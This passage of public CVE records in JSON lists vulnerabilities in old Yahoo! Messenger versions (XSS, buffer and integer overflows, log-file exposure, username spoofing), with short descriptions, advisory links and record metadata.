            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
        },
        {
          "name": "23928",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/23928"
        },
        {
          "name": "31674",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/31674"
        },
        {
          "name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-0768",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields.  NOTE: some of these details are obtained from third party information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "22269",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/22269"
            },
            {
              "name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
            },
            {
              "name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
            },
            {
              "name": "23928",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/23928"
            },
            {
              "name": "31674",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/31674"
            },
            {
              "name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-0768",
    "datePublished": "2007-02-06T02:00:00",
    "dateReserved": "2007-02-05T00:00:00",
    "dateUpdated": "2024-08-07T12:34:19.794Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2006-6603 (GCVE-0-2006-6603)
Vulnerability from cvelistv5
Published
2006-12-15 22:00
Modified
2024-08-07 20:33
Severity ?
CWE
  • n/a
Summary
Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document. NOTE: some details were obtained from third party information.
References
http://securitytracker.com/id?1017387 - vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/21607 - vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/901852 - third-party-advisory, x_refsource_CERT-VN
http://www.vupen.com/english/advisories/2006/5016 - vdb-entry, x_refsource_VUPEN
http://messenger.yahoo.com/security_update.php?id=120806 - x_refsource_CONFIRM
http://secunia.com/advisories/23401 - third-party-advisory, x_refsource_SECUNIA
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T20:33:59.472Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1017387",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1017387"
          },
          {
            "name": "21607",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/21607"
          },
          {
            "name": "VU#901852",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/901852"
          },
          {
            "name": "ADV-2006-5016",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/5016"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://messenger.yahoo.com/security_update.php?id=120806"
          },
          {
            "name": "23401",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/23401"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-12-15T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document.  NOTE: some details were obtained from third party information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2009-02-26T10:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1017387",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1017387"
        },
        {
          "name": "21607",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/21607"
        },
        {
          "name": "VU#901852",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/901852"
        },
        {
          "name": "ADV-2006-5016",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/5016"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://messenger.yahoo.com/security_update.php?id=120806"
        },
        {
          "name": "23401",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/23401"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-6603",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document.  NOTE: some details were obtained from third party information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1017387",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1017387"
            },
            {
              "name": "21607",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/21607"
            },
            {
              "name": "VU#901852",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/901852"
            },
            {
              "name": "ADV-2006-5016",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/5016"
            },
            {
              "name": "http://messenger.yahoo.com/security_update.php?id=120806",
              "refsource": "CONFIRM",
              "url": "http://messenger.yahoo.com/security_update.php?id=120806"
            },
            {
              "name": "23401",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/23401"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-6603",
    "datePublished": "2006-12-15T22:00:00",
    "dateReserved": "2006-12-15T00:00:00",
    "dateUpdated": "2024-08-07T20:33:59.472Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-3638 (GCVE-0-2007-3638)
Vulnerability from cvelistv5
Published
2007-07-10 00:00
Modified
2024-08-07 14:21
Severity ?
CWE
  • n/a
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T14:21:36.599Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "24784",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/24784"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-07-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2007-07-27T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "24784",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/24784"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-3638",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "24784",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/24784"
            },
            {
              "name": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?",
              "refsource": "MISC",
              "url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-3638",
    "datePublished": "2007-07-10T00:00:00",
    "dateReserved": "2007-07-09T00:00:00",
    "dateUpdated": "2024-08-07T14:21:36.599Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-0268 (GCVE-0-2012-0268)
Vulnerability from cvelistv5
Published
2012-01-19 15:00
Modified
2024-09-17 01:46
Severity ?
CWE
  • n/a
Summary
Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow.
References
http://secunia.com/advisories/47041 (third-party-advisory, x_refsource_SECUNIA)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T18:16:20.094Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "47041",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/47041"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-01-19T15:00:00Z",
        "orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
        "shortName": "flexera"
      },
      "references": [
        {
          "name": "47041",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/47041"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
          "ID": "CVE-2012-0268",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "47041",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/47041"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
    "assignerShortName": "flexera",
    "cveId": "CVE-2012-0268",
    "datePublished": "2012-01-19T15:00:00Z",
    "dateReserved": "2011-12-30T00:00:00Z",
    "dateUpdated": "2024-09-17T01:46:26.816Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2005-1671 (GCVE-0-2005-1671)
Vulnerability from cvelistv5
Published
2005-05-19 04:00
Modified
2024-08-07 21:59
Severity ?
CWE
  • n/a
Summary
The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users.
References
http://marc.info/?l=bugtraq&m=111643475210982&w=2 (mailing-list, x_refsource_BUGTRAQ)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T21:59:23.523Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20050518 Yahoo! Messenger may be storing all session data \u0027Unencoded\u0027 on the local machine",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-05-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20050518 Yahoo! Messenger may be storing all session data \u0027Unencoded\u0027 on the local machine",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-1671",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20050518 Yahoo! Messenger may be storing all session data \u0027Unencoded\u0027 on the local machine",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-1671",
    "datePublished": "2005-05-19T04:00:00",
    "dateReserved": "2005-05-19T00:00:00",
    "dateUpdated": "2024-08-07T21:59:23.523Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-0031 (GCVE-0-2002-0031)
Vulnerability from cvelistv5
Published
2002-06-11 04:00
Modified
2024-08-08 02:35
Severity ?
CWE
  • n/a
Summary
Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.
References
http://www.cert.org/advisories/CA-2002-16.html (third-party-advisory, x_refsource_CERT)
http://www.kb.cert.org/vuls/id/137115 (third-party-advisory, x_refsource_CERT-VN)
http://online.securityfocus.com/archive/1/274223 (mailing-list, x_refsource_BUGTRAQ)
http://www.securityfocus.com/bid/4837 (vdb-entry, x_refsource_BID)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:35:17.601Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "CA-2002-16",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT",
              "x_transferred"
            ],
            "url": "http://www.cert.org/advisories/CA-2002-16.html"
          },
          {
            "name": "VU#137115",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/137115"
          },
          {
            "name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://online.securityfocus.com/archive/1/274223"
          },
          {
            "name": "4837",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/4837"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2002-05-27T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2002-06-15T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "CA-2002-16",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT"
          ],
          "url": "http://www.cert.org/advisories/CA-2002-16.html"
        },
        {
          "name": "VU#137115",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/137115"
        },
        {
          "name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://online.securityfocus.com/archive/1/274223"
        },
        {
          "name": "4837",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/4837"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2002-0031",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "CA-2002-16",
              "refsource": "CERT",
              "url": "http://www.cert.org/advisories/CA-2002-16.html"
            },
            {
              "name": "VU#137115",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/137115"
            },
            {
              "name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
              "refsource": "BUGTRAQ",
              "url": "http://online.securityfocus.com/archive/1/274223"
            },
            {
              "name": "4837",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/4837"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-0031",
    "datePublished": "2002-06-11T04:00:00",
    "dateReserved": "2002-01-16T00:00:00",
    "dateUpdated": "2024-08-08T02:35:17.601Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-0321 (GCVE-0-2002-0321)
Vulnerability from cvelistv5
Published
2002-05-03 04:00
Modified
2024-08-08 02:42
Severity ?
CWE
  • n/a
Summary
Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks.
References
http://www.iss.net/security_center/static/8267.php (vdb-entry, x_refsource_XF)
http://www.cert.org/advisories/CA-2002-16.html (third-party-advisory, x_refsource_CERT)
http://marc.info/?l=bugtraq&m=101439616623230&w=2 (mailing-list, x_refsource_BUGTRAQ)
http://www.kb.cert.org/vuls/id/952875 (third-party-advisory, x_refsource_CERT-VN)
http://www.securityfocus.com/bid/4164 (vdb-entry, x_refsource_BID)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:42:29.169Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "yahoo-messenger-username-spoof(8267)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "http://www.iss.net/security_center/static/8267.php"
          },
          {
            "name": "CA-2002-16",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT",
              "x_transferred"
            ],
            "url": "http://www.cert.org/advisories/CA-2002-16.html"
          },
          {
            "name": "20020221 Remote crashes in Yahoo messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
          },
          {
            "name": "VU#952875",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/952875"
          },
          {
            "name": "4164",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/4164"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2002-02-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "yahoo-messenger-username-spoof(8267)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "http://www.iss.net/security_center/static/8267.php"
        },
        {
          "name": "CA-2002-16",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT"
          ],
          "url": "http://www.cert.org/advisories/CA-2002-16.html"
        },
        {
          "name": "20020221 Remote crashes in Yahoo messenger",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
        },
        {
          "name": "VU#952875",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/952875"
        },
        {
          "name": "4164",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/4164"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2002-0321",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
